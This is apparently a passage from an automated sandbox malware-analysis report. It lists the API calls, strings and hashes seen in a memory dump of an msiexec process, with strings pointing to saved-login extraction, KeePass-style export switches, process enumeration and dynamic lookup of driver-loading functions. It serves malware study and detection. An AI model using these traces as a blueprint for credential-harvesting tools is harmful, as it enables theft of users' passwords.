                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                • API String ID: 667068680-2887671607
                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                • API String ID: 1607361635-601624466
                                                                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                • API String ID: 2000436516-3842416460
                                                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                APIs
                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                • String ID:
                                                                                • API String ID: 1043902810-0
                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                • _snwprintf.MSVCRT ref: 0044488A
                                                                                • wcscpy.MSVCRT ref: 004448B4
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                • API String ID: 2899246560-1542517562
                                                                                • Opcode ID: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                • Opcode Fuzzy Hash: 3a239dc6c08d9031e3d9f47b17c09bde30fef5e8f92df5b66a56ab6f901ce2f0
                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                • API String ID: 3330709923-517860148
                                                                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                APIs
                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                • memset.MSVCRT ref: 0040806A
                                                                                • memset.MSVCRT ref: 0040807F
                                                                                • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                • memset.MSVCRT ref: 004081E4
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                • String ID: logins$null
                                                                                • API String ID: 2148543256-2163367763
                                                                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                APIs
                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                • memset.MSVCRT ref: 004085CF
                                                                                • memset.MSVCRT ref: 004085F1
                                                                                • memset.MSVCRT ref: 00408606
                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                • memset.MSVCRT ref: 0040870E
                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                • String ID: ---
                                                                                • API String ID: 3437578500-2854292027
                                                                                • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041087D
                                                                                • memset.MSVCRT ref: 00410892
                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                • String ID:
                                                                                • API String ID: 1010922700-0
                                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                APIs
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                • free.MSVCRT ref: 004186C7
                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                • free.MSVCRT ref: 004186E0
                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                • free.MSVCRT ref: 00418716
                                                                                • free.MSVCRT ref: 0041872A
                                                                                • free.MSVCRT ref: 00418749
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: free$FullNamePath$malloc$Version
                                                                                • String ID: |A
                                                                                • API String ID: 3356672799-1717621600
                                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _wcsicmp
                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                • API String ID: 2081463915-1959339147
                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                • API String ID: 2012295524-70141382
                                                                                • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule
                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                • API String ID: 667068680-3953557276
                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                • String ID:
                                                                                • API String ID: 1700100422-0
                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                APIs
                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2645437609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                • String ID:
                                                                                • API String ID: 552707033-0
                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                APIs
